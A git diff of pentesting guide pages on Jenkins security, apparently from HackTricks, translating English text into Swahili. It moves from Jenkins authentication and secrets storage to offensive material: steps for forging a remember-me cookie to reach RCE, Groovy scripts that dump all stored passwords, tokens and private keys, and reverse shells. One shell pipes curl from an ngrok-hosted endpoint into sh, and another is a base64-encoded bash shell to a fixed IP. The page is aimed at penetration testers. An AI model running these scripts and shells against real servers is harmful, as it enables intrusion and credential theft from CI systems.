-If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
+Ikiwa **cookie iliyoidhinishwa inapatikana**, inaweza kutumika kufikia kikao cha mtumiaji. Cookie hiyo kwa kawaida inaitwa `JSESSIONID.*`. (Mtumiaji anaweza kumaliza vikao vyake vyote, lakini itabidi ajue kwanza kwamba cookie ilipatikana).
### SSO/Plugins
-Jenkins can be configured using plugins to be **accessible via third party SSO**.
+Jenkins inaweza kuundwa kwa kutumia plugins ili iweze **kupatikana kupitia SSO ya upande wa tatu**.
### Tokens
-**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
+**Watumiaji wanaweza kuunda tokens** ili kutoa ufikiaji kwa programu kujiwakilisha kupitia CLI au REST API.
### SSH Keys
-This component provides a built-in SSH server for Jenkins. Itās an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
+Kipengele hiki kinatoa seva ya SSH iliyojengwa ndani kwa Jenkins. Ni kiolesura mbadala kwa [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), na amri zinaweza kutolewa kwa njia hii kwa kutumia mteja yeyote wa SSH. (Kutoka kwenye [docs](https://plugins.jenkins.io/sshd/))
## Authorization
-In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
+Katika `/configureSecurity` inawezekana **kuunda njia ya kuidhinisha ya Jenkins**. Kuna chaguzi kadhaa:
-- **Anyone can do anything**: Even anonymous access can administrate the server
-- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
-- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
-- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+- **Mtu yeyote anaweza kufanya chochote**: Hata ufikiaji wa kutokuwa na jina unaweza kusimamia seva.
+- **Hali ya urithi**: Sawasawa na Jenkins <1.164. Ikiwa una **"nafasi ya admin"**, utapewa **udhibiti kamili** juu ya mfumo, na **vinginevyo** (ikiwemo **watumiaji wasiojulikana**) utakuwa na **ufikiaji wa kusoma**.
+- **Watumiaji walioingia wanaweza kufanya chochote**: Katika hali hii, kila **mtumiaji aliyeingia anapata udhibiti kamili** wa Jenkins. Mtumiaji pekee ambaye hatakuwa na udhibiti kamili ni **mtumiaji asiyejulikana**, ambaye anapata tu **ufikiaji wa kusoma**.
+- **Usalama wa msingi wa Matrix**: Unaweza kuunda **nani anaweza kufanya nini** katika jedwali. Kila **safu** inawakilisha **idhini**. Kila **mstari** **unawakilisha** **mtumiaji au kundi/nafasi.** Hii inajumuisha mtumiaji maalum '**asiyejulikana**', ambaye anawakilisha **watumiaji wasio na uthibitisho**, pamoja na '**uthibitishwa**', ambaye anawakilisha **watumiaji wote walio na uthibitisho**.
.png>)
-- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
-- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+- **Mkakati wa Uidhinishaji wa Msingi wa Mradi:** Hali hii ni **nyongeza** kwa "**Usalama wa msingi wa Matrix**" inayoruhusu ACL ya ziada kuundwa **kwa kila mradi tofauti.**
+- **Mkakati wa Kazi:** Inaruhusu kuunda idhini kwa kutumia **mkakati wa kazi**. Simamia nafasi katika `/role-strategy`.
## **Security Realm**
-In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
+Katika `/configureSecurity` inawezekana **kuunda eneo la usalama.** Kwa kawaida Jenkins inajumuisha msaada wa maeneo kadhaa tofauti ya Usalama:
-- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
-- **Jenkinsā own user database:** Use **Jenkinsās own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
-- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
-- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+- **Delegates kwa kontena la servlet**: Kwa **kuhamasisha uthibitisho kwa kontena la servlet linaloendesha Jenkins controller**, kama [Jetty](https://www.eclipse.org/jetty/).
+- **Hifadhidata ya mtumiaji ya Jenkins:** Tumia **hifadhidata ya mtumiaji iliyojengwa ndani ya Jenkins** kwa uthibitisho badala ya kuhamasisha kwa mfumo wa nje. Hii imewezeshwa kwa kawaida.
+- **LDAP**: Hamisha uthibitisho wote kwa seva ya LDAP iliyowekwa, ikiwa ni pamoja na watumiaji na makundi.
+- **Hifadhidata ya mtumiaji/kundi ya Unix**: **Inahamisha uthibitisho kwa hifadhidata ya mtumiaji ya Unix** kwenye Jenkins controller. Hali hii pia itaruhusu matumizi ya makundi ya Unix kwa idhini.
-Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
+Plugins zinaweza kutoa maeneo ya usalama ya ziada ambayo yanaweza kuwa muhimu kwa kuingiza Jenkins katika mifumo ya utambulisho iliyopo, kama vile:
- [Active Directory](https://plugins.jenkins.io/active-directory)
- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
@@ -55,31 +55,31 @@ Plugins can provide additional security realms which may be useful for incorpora
## Jenkins Nodes, Agents & Executors
-Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
+M definitions kutoka kwenye [docs](https://www.jenkins.io/doc/book/managing/nodes/):
-**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
+**Nodes** ni **mashine** ambazo **wakala wa kujenga** zinaendesha. Jenkins inafuatilia kila node iliyoambatanishwa kwa ajili ya nafasi ya diski, nafasi ya muda ya bure, kubadilishana bure, muda wa saa/sawazisha na muda wa majibu. Node inachukuliwa kuwa nje ya mtandao ikiwa mojawapo ya hizi thamani inatoka nje ya kigezo kilichowekwa.
-**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
+**Agents** **wanasimamia** **utendaji wa kazi** kwa niaba ya Jenkins controller kwa **kutumia waendeshaji**. Wakala anaweza kutumia mfumo wowote wa uendeshaji unaounga mkono Java. Zana zinazohitajika kwa ajili ya kujenga na majaribio zimewekwa kwenye node ambapo wakala anafanya kazi; zinaweza **kuwekwa moja kwa moja au kwenye kontena** (Docker au Kubernetes). Kila **wakala kwa ufanisi ni mchakato wenye PID yake mwenyewe** kwenye mashine mwenyeji.
-An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
+**Executor** ni **nafasi ya utekelezaji wa kazi**; kwa ufanisi, ni **thread katika wakala**. **Idadi ya waendeshaji** kwenye node inafafanua idadi ya **kazi zinazoweza kufanyika kwa wakati mmoja** kwenye node hiyo. Kwa maneno mengine, hii inamua **idadi ya hatua za Pipeline `stages`** zinazoweza kutekelezwa kwenye node hiyo kwa wakati mmoja.
## Jenkins Secrets
### Encryption of Secrets and Credentials
-Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
+M definition kutoka kwenye [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins inatumia **AES kuandika na kulinda siri**, akidi, na funguo zao za uandishi. Funguo hizi za uandishi zimehifadhiwa katika `$JENKINS_HOME/secrets/` pamoja na funguo kuu inayotumika kulinda funguo hizo. Hii directory inapaswa kuundwa ili tu mtumiaji wa mfumo wa uendeshaji ambaye Jenkins controller inafanya kazi kama awe na ufikiaji wa kusoma na kuandika kwenye directory hii (yaani, thamani ya `chmod` ya `0700` au kutumia sifa sahihi za faili). **Funguo kuu** (wakati mwingine inaitwa "funguo ya uandishi wa funguo" katika cryptojargon) inahifadhiwa \_bila kuandikwa\_ kwenye mfumo wa faili wa Jenkins controller katika **`$JENKINS_HOME/secrets/master.key`** ambayo haiwezi kulinda dhidi ya washambuliaji wenye ufikiaji wa moja kwa moja kwa faili hiyo. Watumiaji wengi na wabunifu watatumia funguo hizi za uandishi kwa njia isiyo ya moja kwa moja kupitia ama [Secret](https://javadoc.jenkins.io/byShortName/Secret) API kwa kuandika data ya siri ya kawaida au kupitia API ya akidi. Kwa wale wanaopenda cryptography, Jenkins inatumia AES katika hali ya kuandika block chaining (CBC) na PKCS#5 padding na IV za nasibu kuandika matukio ya [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) ambayo yanahifadhiwa katika `$JENKINS_HOME/secrets/` kwa jina la faili linalolingana na `CryptoConfidentialKey` id yao. Idadi za kawaida za funguo ni pamoja na:
-- `hudson.util.Secret`: used for generic secrets;
-- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
-- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+- `hudson.util.Secret`: inatumika kwa siri za kawaida;
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: inatumika kwa aina fulani za akidi;
+- `jenkins.model.Jenkins.crumbSalt`: inatumika na [mekanism ya ulinzi wa CSRF](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); na
### Credentials Access
-Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project.
+Akidi zinaweza **kuwekwa kwa watoa huduma wa kimataifa** (`/credentials/`) ambazo zinaweza kufikiwa na mradi wowote ulioandaliwa, au zinaweza kuwekwa kwa **miradi maalum** (`/job//configure`) na hivyo kufikiwa tu kutoka mradi maalum.
-According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
+Kulingana na [**docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Akidi ambazo ziko katika upeo zinapatikana kwa pipeline bila kikomo. Ili **kuzuia kufichuliwa kwa bahati mbaya katika kumbukumbu ya kujenga**, akidi zime **fichwa** kutoka kwa matokeo ya kawaida, hivyo mwito wa `env` (Linux) au `set` (Windows), au programu zinazochapisha mazingira yao au vigezo hazitafichua katika kumbukumbu ya kujenga** kwa watumiaji ambao vinginevyo hawangeweza kupata akidi hizo.
-**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
+**Ndio maana ili kuhamasisha akidi mshambuliaji anahitaji, kwa mfano, kuziweka kwenye base64.**
## References
@@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
index 9d2b232e1..58204b264 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -2,108 +2,104 @@
{{#include ../../banners/hacktricks-training.md}}
-In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
+Katika chapisho hili la blog, inawezekana kupata njia nzuri ya kubadilisha udhaifu wa Local File Inclusion katika Jenkins kuwa RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
-This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
+Hii ni muhtasari ulioandikwa na AI wa sehemu ya chapisho ambapo ufundi wa kuki isiyo ya kawaida unatumika vibaya kupata RCE kwa kutumia kusoma faili za ndani hadi nitakapokuwa na muda wa kuunda muhtasari wangu mwenyewe:
-### Attack Prerequisites
+### Masharti ya Shambulio
-- **Feature Requirement:** "Remember me" must be enabled (default setting).
-- **Access Levels:** Attacker needs Overall/Read permissions.
-- **Secret Access:** Ability to read both binary and textual content from key files.
+- **Mahitaji ya Kipengele:** "Remember me" lazima iwe imewezeshwa (mipangilio ya default).
+- **Viwango vya Ufikiaji:** Mshambuliaji anahitaji ruhusa za Jumla/Soma.
+- **Ufikiaji wa Siri:** Uwezo wa kusoma maudhui ya binary na maandiko kutoka kwa faili muhimu.
-### Detailed Exploitation Process
+### Mchakato wa Kina wa Kutekeleza
-#### Step 1: Data Collection
+#### Hatua ya 1: Kukusanya Data
-**User Information Retrieval**
+**Ukurasa wa Taarifa za Mtumiaji**
-- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
- - **Username**
- - **User seed**
- - **Timestamp**
- - **Password hash**
+- Fikia usanidi wa mtumiaji na siri kutoka `$JENKINS_HOME/users/*.xml` kwa kila mtumiaji ili kukusanya:
+- **Jina la Mtumiaji**
+- **Mbegu ya Mtumiaji**
+- **Muda**
+- **Hash ya Nywila**
-**Secret Key Extraction**
+**Uondoaji wa Funguo za Siri**
-- Extract cryptographic keys used for signing the cookie:
- - **Secret Key:** `$JENKINS_HOME/secret.key`
- - **Master Key:** `$JENKINS_HOME/secrets/master.key`
- - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
+- Ondoa funguo za kificho zinazotumika kwa ajili ya kusaini kuki:
+- **Funguo ya Siri:** `$JENKINS_HOME/secret.key`
+- **Funguo Kuu:** `$JENKINS_HOME/secrets/master.key`
+- **Faili ya Funguo ya MAC:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
-#### Step 2: Cookie Forging
+#### Hatua ya 2: Uundaji wa Kuki
-**Token Preparation**
+**Maandalizi ya Tokeni**
-- **Calculate Token Expiry Time:**
+- **Hesabu Muda wa Kuisha wa Tokeni:**
- ```javascript
- tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
- ```
+```javascript
+tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Ongeza saa moja kwa wakati wa sasa
+```
-- **Concatenate Data for Token:**
+- **Unganisha Data kwa Tokeni:**
- ```javascript
- token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
- ```
+```javascript
+token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
+```
-**MAC Key Decryption**
+**Ufunguo wa MAC**
-- **Decrypt MAC Key File:**
+- **Fungua Faili ya Funguo ya MAC:**
- ```javascript
- key = toAes128Key(masterKey) // Convert master key to AES128 key format
- decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file
- if not decrypted.hasSuffix("::::MAGIC::::")
- return ERROR;
- macKey = decrypted.withoutSuffix("::::MAGIC::::")
- ```
+```javascript
+key = toAes128Key(masterKey) // Badilisha funguo kuu kuwa muundo wa funguo AES128
+decrypted = AES.decrypt(macFile, key) // Fungua faili ya .mac
+if not decrypted.hasSuffix("::::MAGIC::::")
+return ERROR;
+macKey = decrypted.withoutSuffix("::::MAGIC::::")
+```
-**Signature Computation**
+**Hesabu Saini**
-- **Compute HMAC SHA256:**
+- **Hesabu HMAC SHA256:**
- ```javascript
- mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
- tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
- ```
+```javascript
+mac = HmacSHA256(token, macKey) // Hesabu HMAC kwa kutumia tokeni na funguo ya MAC
+tokenSignature = bytesToHexString(mac) // Badilisha MAC kuwa mfuatano wa hexadecimal
+```
-**Cookie Encoding**
+**Ufungaji wa Kuki**
-- **Generate Final Cookie:**
+- **Unda Kuki ya Mwisho:**
- ```javascript
- cookie = base64.encode(
- username + ":" + tokenExpiryTime + ":" + tokenSignature
- ) // Base64 encode the cookie data
- ```
+```javascript
+cookie = base64.encode(
+username + ":" + tokenExpiryTime + ":" + tokenSignature
+) // Fanya base64 encode data ya kuki
+```
-#### Step 3: Code Execution
+#### Hatua ya 3: Utekelezaji wa Msimbo
-**Session Authentication**
+**Uthibitishaji wa Kikao**
-- **Fetch CSRF and Session Tokens:**
- - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
- - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
+- **Pata CSRF na Tokeni za Kikao:**
+- Fanya ombi kwa `/crumbIssuer/api/json` ili kupata `Jenkins-Crumb`.
+- Kamata `JSESSIONID` kutoka kwa jibu, ambayo itatumika pamoja na kuki ya remember-me.
-**Command Execution Request**
+**Ombi la Utekelezaji wa Amri**
-- **Send a POST Request with Groovy Script:**
+- **Tuma Ombi la POST na Skripti ya Groovy:**
- ```bash
- curl -X POST "$JENKINS_URL/scriptText" \
- --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
- --header "Jenkins-Crumb: $CRUMB" \
- --header "Content-Type: application/x-www-form-urlencoded" \
- --data-urlencode "script=$SCRIPT"
- ```
+```bash
+curl -X POST "$JENKINS_URL/scriptText" \
+--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
+--header "Jenkins-Crumb: $CRUMB" \
+--header "Content-Type: application/x-www-form-urlencoded" \
+--data-urlencode "script=$SCRIPT"
+```
- - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
+- Skripti ya Groovy inaweza kutumika kutekeleza amri za kiwango cha mfumo au shughuli nyingine ndani ya mazingira ya Jenkins.
-The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
+Mfano wa amri ya curl iliyotolewa inaonyesha jinsi ya kufanya ombi kwa Jenkins na vichwa na kuki zinazohitajika ili kutekeleza msimbo usio wa kawaida kwa usalama.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
index 8699b8159..f98018c19 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -3,10 +3,9 @@
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
-> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-
-You can **dump all the secrets from the Groovy Script console** in `/script` running this code
+> Kumbuka kwamba hizi skripti zitaorodhesha tu siri ndani ya faili `credentials.xml`, lakini **faili za usanidi wa ujenzi** zinaweza pia kuwa na **siri zaidi**.
+Unaweza **kutoa siri zote kutoka kwenye Groovy Script console** katika `/script` ukikimbia hii code
```java
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
@@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '')
return
```
-
-#### or this one:
-
+#### au hii:
```java
import java.nio.charset.StandardCharsets;
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
- com.cloudbees.plugins.credentials.Credentials.class
+com.cloudbees.plugins.credentials.Credentials.class
)
for (c in creds) {
- println(c.id)
- if (c.properties.description) {
- println(" description: " + c.description)
- }
- if (c.properties.username) {
- println(" username: " + c.username)
- }
- if (c.properties.password) {
- println(" password: " + c.password)
- }
- if (c.properties.passphrase) {
- println(" passphrase: " + c.passphrase)
- }
- if (c.properties.secret) {
- println(" secret: " + c.secret)
- }
- if (c.properties.secretBytes) {
- println(" secretBytes: ")
- println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
- println("")
- }
- if (c.properties.privateKeySource) {
- println(" privateKey: " + c.getPrivateKey())
- }
- if (c.properties.apiToken) {
- println(" apiToken: " + c.apiToken)
- }
- if (c.properties.token) {
- println(" token: " + c.token)
- }
- println("")
+println(c.id)
+if (c.properties.description) {
+println(" description: " + c.description)
+}
+if (c.properties.username) {
+println(" username: " + c.username)
+}
+if (c.properties.password) {
+println(" password: " + c.password)
+}
+if (c.properties.passphrase) {
+println(" passphrase: " + c.passphrase)
+}
+if (c.properties.secret) {
+println(" secret: " + c.secret)
+}
+if (c.properties.secretBytes) {
+println(" secretBytes: ")
+println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
+println("")
+}
+if (c.properties.privateKeySource) {
+println(" privateKey: " + c.getPrivateKey())
+}
+if (c.properties.apiToken) {
+println(" apiToken: " + c.apiToken)
+}
+if (c.properties.token) {
+println(" token: " + c.token)
+}
+println("")
}
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
index 89ca15223..b06d2f846 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -2,42 +2,36 @@
{{#include ../../banners/hacktricks-training.md}}
-## Creating a new Pipeline
+## Kuunda Pipeline Mpya
-In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+Katika "Kitu Kipya" (inapatikana katika `/view/all/newJob`) chagua **Pipeline:**
.png>)
-In the **Pipeline section** write the **reverse shell**:
+Katika **sehemu ya Pipeline** andika **reverse shell**:
.png>)
-
```groovy
pipeline {
- agent any
+agent any
- stages {
- stage('Hello') {
- steps {
- sh '''
- curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
- '''
- }
- }
- }
+stages {
+stage('Hello') {
+steps {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+'''
+}
+}
+}
}
```
-
-Finally click on **Save**, and **Build Now** and the pipeline will be executed:
+Hatimaye bonyeza **Save**, na **Build Now** na pipeline itatekelezwa:
.png>)
-## Modifying a Pipeline
+## Kubadilisha Pipeline
-If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+Ikiwa unaweza kufikia faili ya usanidi ya pipeline fulani iliyowekwa unaweza tu **kuibadilisha kwa kuongeza shell yako ya nyuma** na kisha kuitekeleza au kusubiri hadi itekelezwe.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
index f16096070..5b849c2d2 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -4,37 +4,33 @@
## Creating a Project
-This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+Hii mbinu ni kelele sana kwa sababu unahitaji kuunda mradi mpya kabisa (dhahiri hii itafanya kazi tu ikiwa mtumiaji wako anaruhusiwa kuunda mradi mpya).
-1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
-2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
-3. Click **Build now**
- 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
- 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`**
+1. **Unda mradi mpya** (mradi wa Freestyle) kwa kubonyeza "New Item" au katika `/view/all/newJob`
+2. Ndani ya sehemu ya **Build** weka **Execute shell** na ubandike launcher ya powershell Empire au powershell ya meterpreter (inaweza kupatikana kwa kutumia _unicorn_). Anza payload na _PowerShell.exe_ badala ya kutumia _powershell._
+3. Bonyeza **Build now**
+1. Ikiwa kitufe cha **Build now** hakionekani, bado unaweza kwenda kwenye **configure** --> **Build Triggers** --> `Build periodically` na kuweka cron ya `* * * * *`
+2. Badala ya kutumia cron, unaweza kutumia config "**Trigger builds remotely**" ambapo unahitaji tu kuweka jina la api token ili kuanzisha kazi. Kisha nenda kwenye wasifu wako wa mtumiaji na **unda API token** (ita jina hili API token kama ulivyoiita api token ili kuanzisha kazi). Hatimaye, anzisha kazi hiyo kwa: **`curl :@/job//build?token=`**
.png>)
## Modifying a Project
-Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+Nenda kwenye miradi na angalia **kama unaweza kuunda** yoyote kati yao (tafuta "Configure button"):
.png>)
-If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+Ikiwa huwezi kuona **kitufe cha** **configuration** basi huwezi **kuunda** labda (lakini angalia miradi yote kwani unaweza kuwa na uwezo wa kuunda baadhi yao na si wengine).
-Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+Au **jaribu kufikia njia** `/job//configure` au `/me/my-views/view/all/job//configure` \_\_ katika kila mradi (mfano: `/job/Project0/configure` au `/me/my-views/view/all/job/Project0/configure`).
## Execution
-If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+Ikiwa unaruhusiwa kuunda mradi unaweza **kufanya itekeleze amri wakati ujenzi unafanikiwa**:
.png>)
-Click on **Save** and **build** the project and your **command will be executed**.\
-If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+Bonyeza **Save** na **ujenge** mradi na **amri yako itatekelezwa**.\
+Ikiwa hufanyi shell ya kurudi bali amri rahisi unaweza **kuona matokeo ya amri ndani ya matokeo ya ujenzi**.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
index 33821cc03..6293ff517 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -4,24 +4,21 @@
## Jenkins RCE with Groovy Script
-This is less noisy than creating a new project in Jenkins
-
-1. Go to _path_jenkins/script_
-2. Inside the text box introduce the script
+Hii ni kimya zaidi kuliko kuunda mradi mpya katika Jenkins
+1. Nenda kwenye _path_jenkins/script_
+2. Ndani ya kisanduku cha maandiko ingiza scripti
```python
def process = "PowerShell.exe ".execute()
println "Found text ${process.text}"
```
-
You could execute a command using: `cmd.exe /c dir`
In **linux** you can do: **`"ls /".execute().text`**
If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
-**Another useful groovy script** is (replace \[INSERT COMMAND]):
-
+**Scripti nyingine ya groovy yenye manufaa** ni (replace \[INSERT COMMAND]):
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
@@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
-
-### Reverse shell in linux
-
+### Reverse shell katika linux
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
@@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
+### Reverse shell katika windows
